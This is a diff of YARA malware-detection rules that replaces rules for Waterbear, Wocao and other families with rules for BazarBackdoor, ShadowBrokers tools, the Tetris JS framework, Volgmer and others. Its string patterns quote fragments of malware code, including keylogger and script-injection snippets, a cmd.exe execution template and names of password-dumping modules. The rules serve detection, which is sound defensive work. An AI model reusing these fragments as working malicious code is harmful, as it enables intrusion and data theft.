 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "343e6f36190372cd5599a84834edc3935d27a1e01aeab53c5765598b5b4071fe"
+		hash = "d93100fe60c342e9e3b13150fd91c7d8"
+		logic_hash = "f9a9167b806e0e3df3720c13b4009e18c5a36913d255978cb001c2284533ea82"
 		score = 75
-		quality = 85
+		quality = 43
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "15d9db2c90f56cd02be38e7088db8ec00fc603508ec888b4b85d60d970966585"
 
 	strings:
-		$s1 = "O_PROXY" fullword ascii
-		$s2 = "XMODIFY" fullword ascii
+		$msil = "_CorExeMain" ascii wide
+		$str2 = "InvestigateRPC" ascii nocase wide
+		$str3 = "DhcpRecon" ascii nocase wide
+		$str4 = "UnMountWim" ascii nocase wide
+		$str5 = "remote WIM image" ascii nocase wide
+		$str6 = "DISMWrapper" ascii nocase wide
+		$str7 = "findTFTPServer" ascii nocase wide
+		$str8 = "DHCPRequestRecon" ascii nocase wide
+		$str9 = "DHCPDiscoverRecon" ascii nocase wide
+		$str10 = "GoodieFile" ascii nocase wide
+		$str11 = "InfoStore" ascii nocase wide
+		$str12 = "execute" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $msil and all of ( $str* )
 }
-rule SIGNATURE_BASE_Waterbear_13_Jun17 : FILE
+rule SIGNATURE_BASE_Crime_Win64_Backdoor_Bazarbackdoor1 : FILE
 {
 	meta:
-		description = "Detects malware from Operation Waterbear"
-		author = "Florian Roth (Nextron Systems)"
-		id = "425aaed4-879e-5caf-808b-14de98f628e8"
-		date = "2017-06-23"
+		description = "Detects BazarBackdoor injected 64-bit malware"
+		author = "@VK_Intel"
+		id = "1e387791-97fa-527d-87ed-68872b1891c4"
+		date = "2020-04-24"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/L9g9eR"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_waterbear.yar#L219-L243"
+		reference = "https://twitter.com/pancak3lullz/status/1252303608747565057"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_bazarbackdoor.yar#L1-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b34c3d643309b8bbaa122a753e7f58dd9340cfa33962dbab1454c8080afd1664"
+		logic_hash = "becb6ebc3a1be061b4f602cc188b172f59bfb6342605af68d8b38009d589f57e"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "734e5972ab5ac1e9bc5470c666a55e0d2bd57c4e2ea2da11dc9bf56fb2ea6f23"
-		hash2 = "8bde3f71575aa0d5f5a095d9d0ea10eceadba38be888e10d3ca3776f7b361fe7"
-		hash3 = "c4b3b0a7378bfc3824d4178fd7fb29475c42ab874d69abdfb4898d0bcd4f8ce1"
+		tlp = "white"
 
 	strings:
-		$s1 = "%WINDIR%\\PCHealth\\HelpCtr\\Binaries\\pchsvc.dll" fullword ascii
-		$s2 = "brnew.exe" fullword ascii
-		$s3 = "ChangeServiceConfig failed (%d)" fullword ascii
-		$s4 = "Proxy %d:%s %d" fullword ascii
-		$s5 = "win9807.tmp" fullword ascii
-		$s7 = "Service stopped successfully" fullword ascii
-		$s8 = "current dns:%s" fullword ascii
-		$s9 = "%c%u|%u|%u|%u|%u|" fullword ascii
-		$s10 = "[-]send %d: " fullword ascii
+		$str1 = "%id%"
+		$start = { 48 ?? ?? ?? ?? 57 48 83 ec 30 b9 01 00 00 00 e8 ?? ?? ?? ?? 84 c0 0f ?? ?? ?? ?? ?? 40 32 ff 40 ?? ?? ?? ?? e8 ?? ?? ?? ?? 8a d8 8b ?? ?? ?? ?? ?? 83 f9 01 0f ?? ?? ?? ?? ?? 85 c9 75 ?? c7 ?? ?? ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? e8 ?? ?? ?? ?? 85 c0 74 ?? b8 ff 00 00 00 e9 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? e8 ?? ?? ?? ?? c7 ?? ?? ?? ?? ?? ?? ?? ?? ?? eb ?? 40 b7 01 40 ?? ?? ?? ?? 8a cb e8 ?? ?? ?? ?? e8 ?? ?? ?? ?? 48 8b d8 48 ?? ?? ?? 74 ??}
+		$server = {40 53 48 83 ec 20 48 8b d9 e8 ?? ?? ?? ?? 85 c0 75 ?? 0f ?? ?? ?? ?? ?? ?? 66 83 f8 50 74 ?? b9 bb 01 00 00 66 3b c1 74 ?? a8 01 74 ?? 48 8b cb e8 ?? ?? ?? ?? 84 c0 75 ?? 48 8b cb e8 ?? ?? ?? ?? b8 f6 ff ff ff eb ?? 33 c0 48 83 c4 20 5b c3}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 4 of them )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE_Waterbear_14_Jun17 : FILE
+
+rule SIGNATURE_BASE_SUSP_Fake_AMSI_DLL_Jun23_1 : FILE
 {
 	meta:
-		description = "Detects malware from Operation Waterbear"
-		author = "Florian Roth (Nextron Systems)"
-		id = "515d9400-3e2e-5ee5-a7dd-b313125c6482"
-		date = "2017-06-23"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/L9g9eR"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_waterbear.yar#L245-L261"
+		description = "Detects an amsi.dll that has the same exports as the legitimate one but very different contents or file sizes"
+		author = "Florian Roth"
+		id = "b12df9de-ecfb-562b-b599-87fa786a33bc"
+		date = "2023-06-07"
+		modified = "2023-06-12"
+		reference = "https://twitter.com/eversinc33/status/1666121784192581633?s=20"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_fake_amsi_dll.yar#L3-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9ebe46590556e8eba2eef1c007549f6141c917bab97d46a0d58eca56257e24e2"
-		score = 75
+		logic_hash = "ec3db233ab22144bc65614b45bb894a7ea5a4fd40ccb603e6e52cc1b9ff8805b"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "00a1068645dbe982a9aa95e7b8202a588989cd37de2fa1b344abbc0102c27d05"
-		hash2 = "53330a80b3c4f74f3f10a8621dbef4cd2427723e8b98c5b7aed58229d0c292ba"
-		hash3 = "bdcb23a82ac4eb1bc9254d77d92b6f294d45501aaea678a3d21c8b188e31e68b"
 
 	strings:
-		$s1 = "my.com/msg/util/sgthash" fullword ascii
-		$s2 = "C:\\recycled" fullword ascii
+		$a1 = "Microsoft.Antimalware.Scan.Interface" ascii
+		$a2 = "Amsi.pdb" ascii fullword
+		$a3 = "api-ms-win-core-sysinfo-" ascii
+		$a4 = "Software\\Microsoft\\AMSI\\Providers" wide
+		$a5 = "AmsiAntimalware@" ascii
+		$a6 = "AMSI UAC Scan" ascii
+		$fp1 = "Wine builtin DLL"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 8000KB and all of them )
+		uint16( 0 ) == 0x5a4d and ( pe.exports ( "AmsiInitialize" ) and pe.exports ( "AmsiScanString" ) ) and ( filesize > 200KB or filesize < 35KB or not 4 of ( $a* ) ) and not 1 of ( $fp* )
 }
 
-rule SIGNATURE_BASE_MAL_Ransomware_Wadhrama : FILE
+rule SIGNATURE_BASE_SUSP_NVIDIA_LAPSUS_Leak_Compromised_Cert_Mar22_1 : FILE
 {
 	meta:
-		description = "Detects Wadhrama Ransomware via Imphash"
+		description = "Detects a binary signed with the leaked NVIDIA certifcate and compiled after March 1st 2022"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f7de40e9-fe22-5f14-abc6-f6611a4382ac"
-		date = "2019-04-07"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_mal_ransom_wadharma.yar#L3-L13"
+		id = "8bc7460f-a1c4-5157-8c2d-34d3a6c9c7e9"
+		date = "2022-03-03"
+		modified = "2022-03-04"
+		reference = "https://twitter.com/cyb3rops/status/1499514240008437762"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_nvidia_leaked_cert.yar#L4-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5d78837ed7cb8914be0990859751cf64603ee5a5ad135541c60c6ae145046412"
-		score = 75
+		logic_hash = "e7e9e58ec1e3922471ad3ffd4ad9fbb3ac4b3c3841c35d1cd8886607f3cf1ab9"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "557c68e38dce7ea10622763c10a1b9f853c236b3291cd4f9b32723e8714e5576"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and pe.imphash ( ) == "f86dec4a80961955a89e7ed62046cc0e"
+		uint16( 0 ) == 0x5a4d and filesize < 100MB and pe.timestamp > 1646092800 and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "VeriSign Class 3 Code Signing 2010 CA" and ( pe.signatures [ i ] . serial == "43:bb:43:7d:60:98:66:28:6d:d8:39:e1:d0:03:09:f5" or pe.signatures [ i ] . serial == "14:78:1b:c8:62:e8:dc:50:3a:55:93:46:f5:dc:c5:18" ) )
 }
-rule SIGNATURE_BASE_Custom_Ssh_Backdoor_Server
+rule SIGNATURE_BASE_FVEY_Shadowbrokers_Jan17_Screen_Strings : FILE
 {
 	meta:
-		description = "Custome SSH backdoor based on python and paramiko - file server.py"
+		description = "Detects strings derived from the ShadowBroker's leak of Windows tools/exploits"
 		author = "Florian Roth (Nextron Systems)"
-		id = "eccf705b-b2c3-5af6-ab86-70292089812b"
-		date = "2015-05-14"
-		modified = "2022-08-18"
-		reference = "https://goo.gl/S46L3o"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_backdoor_ssh_python.yar#L2-L17"
+		id = "59832d0a-0cb2-5eb9-a4e2-36aaa09a3998"
+		date = "2017-01-08"
+		modified = "2023-12-05"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message7/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_jan17.yar#L10-L47"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0953b6c2181249b94282ca5736471f85d80d41c9"
-		logic_hash = "7bb142b69a75003e8f26d462c0895a3d807d5c326684e83d756178a3b91669dc"
+		logic_hash = "8015b227c5df68fffadb86b72843b2b831d5603978ada3f50cc535a870aa94eb"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "command= raw_input(\"Enter command: \").strip('n')" fullword ascii
-		$s1 = "print '[-] (Failed to load moduli -- gex will be unsupported.)'" fullword ascii
-		$s2 = "print '[-] Listen/bind/accept failed: ' + str(e)" fullword ascii
+		$x1 = "Danderspritz" ascii wide fullword
+		$x2 = "DanderSpritz" ascii wide fullword
+		$x3 = "PeddleCheap" ascii wide fullword
+		$x4 = "ChimneyPool Addres" ascii wide fullword
+		$a1 = "Getting remote time" fullword ascii
+		$a2 = "RETRIEVED" fullword ascii
+		$b1 = "Added Ops library to Python search path" fullword ascii
+		$b2 = "target: z0.0.0.1" fullword ascii
+		$c1 = "Psp_Avoidance" fullword ascii
+		$c2 = "PasswordDump" fullword ascii
+		$c4 = "EventLogEdit" fullword ascii
+		$d1 = "Mcl_NtElevation" fullword ascii wide
+		$d2 = "Mcl_NtNativeApi" fullword ascii wide
+		$d3 = "Mcl_ThreatInject" fullword ascii wide
+		$d4 = "Mcl_NtMemory" fullword ascii wide
 
 	condition:
-		2 of them
+		filesize < 2000KB and ( 1 of ( $x* ) or all of ( $a* ) or 1 of ( $b* ) or ( uint16( 0 ) == 0x5a4d and 1 of ( $c* ) ) or 3 of ( $c* ) or ( uint16( 0 ) == 0x5a4d and 3 of ( $d* ) ) )
 }
-rule SIGNATURE_BASE_Pos_Malware_Malumpos
+rule SIGNATURE_BASE_Apt_CN_Tetris_JS_Advanced_1 : FILE
 {
 	meta:
-		description = "Used to detect MalumPOS memory dumper"
-		author = "Trend Micro, Inc."
-		id = "6d85c7fe-bf1b-53fb-b618-4b0f8b63cae4"
-		date = "2015-05-25"
+		description = "Unique code from Jetriz, Swid & Jeniva of the Tetris framework"
+		author = "@imp0rtp3 (modified by Florian Roth)"
+		id = "a56f69f5-3562-52ab-9686-411019c51055"
+		date = "2020-09-06"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_malumpos.yar#L1-L17"
+		reference = "https://imp0rtp3.wordpress.com/2021/08/12/tetris"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_tetris.yar#L2-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ece32e51a12adf0d68420c8d98efbe7df27b9061ddfe4dcedf151f9f06287eee"
+		logic_hash = "ec4ba53fea05c5331ed900b8c7da4cddd4ab64e87dfc165ac18d72d22f754d87"
 		score = 75
-		quality = 60
-		tags = ""
-		sample_filtype = "exe"
+		quality = 85
+		tags = "FILE"
 
 	strings:
-		$string1 = "SOFTWARE\\Borland\\Delphi\\RTL"
-		$string2 = "B)[0-9]{13,19}\\"
-		$string3 = "[A-Za-z\\s]{0,30}\\/[A-Za-z\\s]{0,30}\\"
-		$string4 = "TRegExpr(exec): ExecNext Without Exec[Pos]"
-		$string5 = /Y:\\PROGRAMS\\.{20,300}\.pas/
+		$a1 = "var a0_0x"
+		$b1 = "a0_0x" ascii
+		$cx1 = "))),function(){try{var _0x"
+		$cx2 = "=window)||void 0x0===_0x"
+		$cx3 = "){if(opener&&void 0x0!==opener["
+		$cx4 = "String['fromCharCode'](0x"
+		$e1 = "')](__p__)"
 
 	condition:
-		all of ( $string* )
+		$a1 at 0 or ( filesize < 1000KB and ( #b1 > 300 or #e1 > 1 or 2 of ( $cx* ) ) )
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Agent_Csharp
+rule SIGNATURE_BASE_Apt_CN_Tetrisplugins_JS : FILE
 {
 	meta:
-		description = "Strings from CSharp version of Agent"
-		author = "Fox-IT SRT"
-		id = "e5212226-a82d-558d-abb4-43ad7848764e"
-		date = "2023-12-05"
+		description = "Code and strings of plugins from the Tetris framework loaded by Swid"
+		author = "@imp0rtp3"
+		id = "83e6fbad-55d6-5229-a17d-8929e0e658f8"
+		date = "2020-09-06"
 		modified = "2023-12-05"
-		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_wocao.yar#L2-L22"
+		reference = "https://imp0rtp3.wordpress.com/2021/08/12/tetris"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_tetris.yar#L34-L114"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e77fcd2ac0c21db54563b15466962a775a5e8ef73cedb3af5cd00d5b0d615e4c"
+		logic_hash = "fa77d622584e79c86139b9c0f0b8ff46fc10461d0776e46c93490b6bb667afcf"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = 60
+		tags = "FILE"
 
 	strings:
-		$a = "mysend(client_sock, new byte[] { 0x16, 0x00 }, 2);" ascii wide
-		$b = "Dns.GetHostAddresses(sip.Remove(sip.Length - 1));" ascii wide
-		$c = "Port = 256 * buf[4] + buf[5];" ascii wide
-		$d = "Port = 256 * buf[AddrLen] + buf[AddrLen + 1];" ascii wide
-		$e = "StartTransData(CliSock" ascii wide
-		$f = "static void ForwardTransmit(object ft_data)" ascii wide
-		$key = "0x4c, 0x1b, 0x68, 0x0b, 0x6a, 0x18, 0x09, 0x41, 0x5a, 0x36, 0x1f, 0x56, 0x26, 0x2a, 0x03, 0x44, 0x7d, 0x5f, 0x03, 0x7b, 0x07, 0x6e, 0x03, 0x77, 0x30, 0x70, 0x52, 0x42, 0x53, 0x67, 0x0a, 0x2a" ascii wide
-		$key_raw = { 4c1b680b6a1809415a361f56262a03447d5f037b076e03773070524253670a2a }
+		$a3 = "(0xbb8);this['socketWatcher'](0xbb9);this["
+		$a4 = "a2869674571f77b5a0867c3d71db5856"
+		$a5 = "\\x0a\\x20\\x20var\\x20data\\x20=\\x20{}\\x0a\\x20\\x20window.c\\x20=\\x200\\x0a\\x20\\x20script2\\x20=\\x20document.createElement(\\x22script\\x22)\\x0a\\x20\\x20script2.async\\x20=\\x20true\\x0a\\x20\\x20script2.src\\x20=\\x20\\x22"
+		$a6 = "{isPluginCallback:\\x20true,\\x20data,\\x20plugin:\\x20'"
+		$a7 = "\\x20\\x22*\\x22)\\x0a\\x20\\x20}\\x0a\\x20\\x20document.documentElement.appendChild("
+		$b1 = "String(str).match(/red\">(.*?)<\\/font>/)"
+		$b2 = "['data']);}};}},{'key':'run','value':function _0x"
+		$b3 = "},{'plugin':this['plugin'],'save':!![],'type':_typeof("
+		$b4 = "Cannot\\x20call\\x20a\\x20class\\x20as\\x20a\\x20function"
+		$b5 = "The\\x20command\\x20is\\x20sent\\x20successfully,\\x20wait\\x20for\\x20the\\x20result\\x20to\\x20return"
+		$b6 = "getUserMedia\\x20is\\x20not\\x20implemented\\x20in\\x20this\\x20browser"
+		$b7 = "{'autoplay':'true'},!![]);setTimeout(function(){return $('#'+"
+		$b8 = "keyLogger($('input'));\n        keyLogger($('textarea'));"
+		$b9 = "api.loadJS(\"\".concat(api.base.baseUrl"
+		$b10 = "\"\".concat(imgUrls[i], \"?t=\""
+		$b11 = "key: \"report\",\n      value: function report(data) {\n        return this.api.callback"
+		$b12 = "that.api.base.debounce("
+		$b13 = "'className','restOfNavigator','push'"
+		$b14 = ";};'use strict';function _typeof("
+		$c1 = "/public/dependence/jquery"
+		$c2 = "'http://bn6kma5cpxill4pe.onion/static/images/tor-logo1x.png'"
+		$c3 = "'163.com not login';"
+		$c4 = "'ws://localhost:'"
+		$c5 = "function _typeof(obj) { \"@babel/helpers - typeof\"; "
+		$c6 = "'socketWatcher'"
+		$c7 = "['configurable']=!![];"
+		$c8 = "')]({'status':!![],'data':_0x"
+		$c9 = "')]={'localStorage':'localStorage'in window?window[_0x"
+		$c10 = "Browser not supported geolocation.');"
+		$c11 = "')]({'status':!![],'msg':'','data':_0x"
+		$c12 = "var Plugin = /*#__PURE__*/function () {"
+		$use_strict1 = "\"use strict\";"
+		$use_strict2 = "'use strict';"
+		$e1 = "Cannot\x20call\x20a\x20class\x20as\x20a\x20function" base64
+		$e2 = "The\x20command\x20is\x20sent\x20successfully,\x20wait\x20for\x20the\x20result\x20to\x20return" base64
+		$e3 = "getUserMedia\x20is\x20not\x20implemented\x20in\x20this\x20browser" base64
+		$e4 = "http://bn6kma5cpxill4pe.onion/static/images/tor-logo1x.png" base64
+		$e5 = "/public/dependence/jquery" base64
+		$e6 = "\x20\x22*\x22)\x0a\x20\x20}\x0a\x20\x20document.documentElement.appendChild(" base64
+		$e8 = "\x0a\x20\x20var\x20data\x20=\x20{}\x0a\x20\x20window.c\x20=\x200\x0a\x20\x20script2\x20=\x20document.createElement(\x22script\x22)\x0a\x20\x20script2.async\x20=\x20true\x0a\x20\x20script2.src\x20=\x20\x22" base64
+		$e9 = "{isPluginCallback:\x20true,\x20data,\x20plugin:\x20" base64
 
 	condition:
-		1 of them
+		filesize < 1000000 and ( any of ( $a* ) or 2 of ( $b* ) or 4 of ( $c* ) or 2 of ( $e* ) or ( any of ( $use_strict* ) and ( ( any of ( $b* ) and 2 of ( $c* ) ) or any of ( $e* ) ) ) )
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Agent_Powershell_Dropper
+rule SIGNATURE_BASE_SUSP_VEST_Encryption_Core_Accumulator_Jan21 : FILE
 {
 	meta:
-		description = "Strings from PowerShell dropper of CSharp version of Agent"
-		author = "Fox-IT SRT"
-		id = "833ce607-56a9-5580-bbd1-e72392945fec"
-		date = "2023-12-05"
+		description = "Detects VEST encryption core accumulator in PE file as used by Lazarus malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8343652b-8865-5213-b735-d6d4084e4a84"
+		date = "2021-01-28"
 		modified = "2023-12-05"
-		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_wocao.yar#L24-L38"
+		reference = "https://twitter.com/ochsenmeier/status/1354737155495649280"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_jan21.yar#L2-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "19f56e69685ae8c13b9dd884f8322915835c16e2c6313f01f9fa447218419108"
-		score = 75
+		logic_hash = "41fe42b2f2b5fb54b7ff19b74a35aadd928be9a3c7280ee9feffc4a142924b07"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "7cd3ca8bdfb44e98a4b9d0c6ad77546e03d169bda9bdf3d1bcf339f68137af23"
 
 	strings:
-		$a = "function format([string]$source)"
-		$b = "foreach($c in $bb){$tt = $tt + [char]($c -bxor"
-		$c = "[agent]::Main($args);"
+		$sc1 = { 4F 70 46 DA E1 8D F6 41 59 E8 5D 26 1E CC 2F 89
+               26 6D 52 BA BC 11 6B A9 C6 47 E4 9C 1E B6 65 A2
+               B6 CD 90 47 1C DF F8 10 4B D2 7C C4 72 25 C6 97
+               25 5D C6 1D 4B 36 BC 38 36 33 F8 89 B4 4C 65 A7
+               96 CA 1B 63 C3 4B 6A 63 DC 85 4C 57 EE 2A 05 C7
+               0C E7 39 35 8A C1 BF 13 D9 52 51 3D 2E 41 F5 72
+               85 23 FE A1 AA 53 61 3B 25 5F 62 B4 36 EE 2A 51
+               AF 18 8E 9A C6 CF C4 07 4A 9B 25 9B 76 62 0E 3E
+               96 3A A7 64 23 6B B6 19 BC 2D 40 D7 36 3E E2 85
+               9A D1 22 9F BC 30 15 9F C2 5D F1 23 E6 3A 73 C0 }
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Agent_Powershell_B64Encoded
+rule SIGNATURE_BASE_TA17_318B_Volgmer : FILE
 {
 	meta:
-		description = "Piece of Base64 encoded data from Agent CSharp version"
-		author = "Fox-IT SRT"
-		id = "14e1702d-6229-5989-8bb7-cc9c0c321676"
-		date = "2023-12-05"
+		description = "Malformed User Agent in Volgmer malware"
+		author = "US CERT"
+		id = "20a7f64b-0fee-5235-ac91-2fc811497ac6"
+		date = "2017-11-15"
 		modified = "2023-12-05"
-		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_wocao.yar#L40-L52"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-318B"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ta17_318B.yar#L9-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bcf9a75dbbf90044db76c56ffd07971d4252b0e75d73abf402ca4fadbfb59767"
+		logic_hash = "2b3a7e501214767b7d79b33fb560b5611fa3726036a0c98d6f1904a55f306e40"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$header = "LFNVT0hBBnVfVVJDSx0sU1VPSEEGdV9VUkNLCG9pHSxTVU9IQQZ1X1VSQ0sIZUlK"
+		$s = "Mozillar/"
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and $s
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Agent_Py
+
+rule SIGNATURE_BASE_Volgmer_Malware : FILE
 {
 	meta:
-		description = "Strings from Python version of Agent"
-		author = "Fox-IT SRT"
-		id = "ca30dd6a-b596-54ab-b4f0-50e6b1382f73"
-		date = "2023-12-05"
+		description = "Detects Volgmer malware as reported in US CERT TA17-318B"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a8df5f70-69e7-5c95-8af7-7dda6bb9c77a"
+		date = "2017-11-15"
 		modified = "2023-12-05"
-		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_wocao.yar#L54-L75"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-318B"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ta17_318B.yar#L34-L71"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9b6eba750c96501aae1d86eef458d3e80de665efc7ce9d5aff842bc44363bad2"
+		logic_hash = "898c2734c56a40aa4d24c1eac2dfb7dd1f98b0bdf7a11ab518eef282becb84b6"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ff2eb800ff16745fc13c216ff6d5cc2de99466244393f67ab6ea6f8189ae01dd"
+		hash2 = "8fcd303e22b84d7d61768d4efa5308577a09cc45697f7f54be4e528bbb39435b"
+		hash3 = "eff3e37d0406c818e3430068d90e7ed2f594faa6bb146ab0a1c00a2f4a4809a5"
+		hash4 = "e40a46e95ef792cf20d5c14a9ad0b3a95c6252f96654f392b4bc6180565b7b11"
+		hash5 = "6dae368eecbcc10266bba32776c40d9ffa5b50d7f6199a9b6c31d40dfe7877d1"
+		hash6 = "fee0081df5ca6a21953f3a633f2f64b7c0701977623d3a4ec36fff282ffe73b9"
+		hash7 = "53e9bca505652ef23477e105e6985102a45d9a14e5316d140752df6f3ef43d2d"
+		hash8 = "1d0999ba3217cbdb0cc85403ef75587f747556a97dee7c2616e28866db932a0d"
 
 	strings:
-		$a = "vpshex.decode"
-		$b = "self._newsock.recv"
-		$c = "Rsock.connect"
-		$d = /MAX_DATALEN\s?=\s?10240/
-		$e = /LISTEN_MAXCOUNT\s?=\s?80/
-		$f = "ListenSock.listen(LISTEN_MAXCOUNT)"
-		$g = "nextsock.send(head)"
-		$h = "elif transnode"
-		$i = "infobuf[4:6]"
-		$key = "L\\x1bh\\x0bj\\x18\\tAZ6\\x1fV&*\\x03D}_\\x03{\\x07n\\x03w0pRBSg\\n*"
+		$x1 = "User-Agent: Mozillar/5.0" fullword ascii
+		$x2 = "[Cmd] - CMD_BOTCMD_CONNLOG_GET" fullword wide
+		$x3 = "[TestConnect To Bot] - Port = %d" fullword ascii
+		$x4 = "b50a338264226b6d57c1936d9db140ba74a28930270a083353645a9b518661f4fcea160d7" ascii
+		$s1 = "%sigfx%c%c%c.exe" fullword wide
+		$s2 = "H_%s_%016I64X_%04d%02d%02d%02d%02d%02d.TXT" fullword ascii
+		$s3 = "cmd.exe /c %s > %s 2>&1" fullword wide
+		$s4 = "%s\\dllcache\\%s.dll" fullword ascii
+		$s5 = "Cond Fail." fullword ascii
+		$s6 = "The %s %s%s" fullword ascii
+		$s7 = "%s \"%s\"%s \"%s\" %s \"%s\"" fullword ascii
+		$s8 = "DLL_Spider.dll" fullword ascii
 
 	condition:
-		1 of them
+		filesize < 400KB and ( 1 of ( $x* ) or ( uint16( 0 ) == 0x5a4d and 2 of them ) ) or ( uint16( 0 ) == 0x5a4d and pe.imphash ( ) == "ea42395e901b33bad504798e0f0fd74b" )
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Agent_Py_B64Encoded
+rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_1 : FILE
 {
 	meta:
-		description = "Piece of Base64 encoded data from Agent Python version"
-		author = "Fox-IT SRT"
-		id = "eb2701e9-4358-5d24-bfcd-b4dde24f13bf"
-		date = "2023-12-05"
